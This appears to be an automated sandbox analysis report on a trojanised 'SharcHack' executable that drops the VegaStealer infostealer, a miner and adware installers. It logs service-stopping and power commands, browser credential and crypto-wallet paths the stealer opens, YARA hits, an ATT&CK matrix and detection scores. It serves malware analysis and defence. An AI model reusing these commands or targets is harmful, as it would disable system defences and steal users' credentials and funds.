Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Code function: 7_2_6BBDA8D4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_6BBDA8D4

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B61BFD7 GetTimeZoneInformation,

8_2_6B61BFD7

Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Code function: 8_2_6B4D0458 SysAllocString,__EH_prolog3_GS,GetCurrentThread,GetCurrentThreadId,GetVersionExW,

8_2_6B4D0458

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Stealing of Sensitive Information

Yara detected Ades Stealer

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected BlackGuard

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected Nitro Stealer

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected VEGA Stealer

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: JaxxDir
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusDir
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %\Wallets\DashCore\)\DashCore\wallet.dat#\Electrum\wallets%\Wallets\Electrum\%\Ethereum\keystore%\Wallets\Ethereum\-\Exodus\exodus.wallet\!\Wallets\Exodus\m\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: [Org.BouncyCastle.Pkcs12.IgnoreUselessPasswordtrueqpassword supplied for keystore that does not require one

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Remote Access Functionality

Yara detected Ades Stealer

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected BlackGuard

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected Nitro Stealer

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Yara detected VEGA Stealer

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VegaStealer_v2.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: v2.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\v2.exe

Code function: 7_2_6BBF9200 GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_memset,__snprintf,OutputDebugStringA,

7_2_6BBF9200

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
1 Software	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	21 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	11 Windows Service	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	112 Command and Scripting Interpreter	2 Scheduled Task/Job	11 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	67 System Information Discovery	SMB/Windows Admin Shares	21 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Scheduled Task/Job	Login Hook	311 Process Injection	3 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	Network Logon Script	2 Scheduled Task/Job	1 Timestomp	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	13 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	2 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	151 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SharcHack.exe	78%	Virustotal		Browse
SharcHack.exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.CrypterX
SharcHack.exe	100%	Avira	DR/Delphi.Gen
SharcHack.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	HEUR/AGEN.1329655
C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	100%	Avira	HEUR/AGEN.1339346
C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	100%	Avira	PUA/OfferCore.Gen
C:\Users\user\AppData\Local\Temp\3.exe	100%	Avira	HEUR/AGEN.1329655
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	43%	ReversingLabs	Win32.PUA.OfferCore
C:\Users\user\AppData\Local\Temp\EntityFramework.SqlServer.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\EntityFramework.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\SQLite.Interop.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	100%	ReversingLabs	Win32.Hacktool.Vbinder
C:\Users\user\AppData\Local\Temp\is-3E079.tmp\CheatEngine75.exe	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3E079.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract\saBSI.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1_extract\WZSetup.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3E079.tmp\zbShieldUtils.dll	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\v2.exe	83%	ReversingLabs	ByteCode-MSIL.Infostealer.Stealgen
C:\Windows\Temp\cfoutowi.tmp	62%	ReversingLabs	Win64.Trojan.Miner

Source	Detection	Scanner	Label
https://shield.reasonsecurity.com/rsStubActivator.exe.	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net:443/zbdWgI	0%	Avira URL Cloud	safe
https://www.mcafee.com/consumer/en-us/policy/legal.htmles/969/EN.pngzipMSSP	0%	Avira URL Cloud	safe
http://go.microsof	0%	Avira URL Cloud	safe
https://www.premieropinion.com/privacy-policyl	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zippM32-xL	0%	Avira URL Cloud	safe
http://ns.adobe.0/	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.png	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/f/	0%	Avira URL Cloud	safe
https://www.mcafee.com/consumer/en-us/policy/legal.htmlReplaced/OperaSetup.zipnet	0%	Avira URL Cloud	safe
https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.png	0%	Avira URL Cloud	safe
http://www.microsoft.cxx	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzip)yH	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net:443/zbdk5fi.cloudfront.net:443/zbdv	0%	Avira URL Cloud	safe
http://crl3.digicert.cPom/D	0%	Avira URL Cloud	safe
https://shield.reasonsecurity.com/rsStubActivator.exeles/969/WZSetup.zip	0%	Avira URL Cloud	safe
http://crl3.digicert	0%	Avira URL Cloud	safe
https://shield.reasonsecurity.com/rsStubActivator.exem	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipjy	0%	Avira URL Cloud	safe
https://www.mcafee.com/consumer/en-us/policy/legal.html4	0%	Avira URL Cloud	safe
https://d31tu1fsc224h4.cloudfront.net/IN	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipTEM32-xL	0%	Avira URL Cloud	safe
https://www.avast.co	0%	Avira URL Cloud	safe
http://cacerts.di	0%	Avira URL Cloud	safe
https://d31tu1fsc224h4.cloudfront.net:443/gd	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net:443/zbd	0%	Avira URL Cloud	safe
